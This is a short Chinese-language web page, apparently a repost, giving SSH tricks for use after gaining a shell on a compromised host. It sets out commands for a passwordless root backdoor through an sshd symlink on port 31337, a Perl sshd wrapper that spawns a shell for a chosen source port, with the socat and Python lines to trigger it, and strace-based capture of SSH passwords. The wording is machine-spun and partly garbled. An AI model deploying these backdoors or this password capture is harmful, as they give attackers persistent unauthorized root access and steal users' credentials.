|
|
|
联系客服020-83701501

渗透技巧之SSH篇

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
渗入技能格局之SSH篇

用些小技能格局,蒙蒙菜鸟治理员。

1. 入侵获得SHELL后,对方防火墙没限制,想快速枯槁一个大约拜访的SSH端口

肉鸡上履行

Default
1 mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;

就会派生一个31337端口,日后连接31337,用root/bin/ftp/mail当用户名,暗码随便,便可登陆。

成效图:

 

enter image description here

2. 做一个SSH wrapper后门,成效比第一个好,没有枯槁额外的端口,只需对方开了SSH效劳,就能近程连接

在肉鸡上履行:

Default
1234567 [root@localhost ~]# cd /usr/sbin[root@localhost sbin]# mv sshd ../bin[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd[root@localhost sbin]# chmod u+x sshd[root@localhost sbin]# /etc/init.d/sshd restart

在本机履行:

Default
1 socat STDIO TCP4:10.18.180.20:22,sourceport=13377

假设你想修改源端口,大约用python的struct尺度库实现

Default
1234567 >>> import struct>>> buffer = struct.pack('>I6',19526)>>> print repr(buffer)'\x00\x00LF'>>> buffer = struct.pack('>I6',13377)>>> print buffer4A

成效图下列:

enter image description here

3. 记录SSH客户端连接暗码

搞定主机后,常常想记录肉鸡SSH连接到其他主机的暗码,进一步扩大战果,操作strace命令就好了。

成效图:

enter image description here

[via@dropwooyun]

数安新闻+更多

证书相关+更多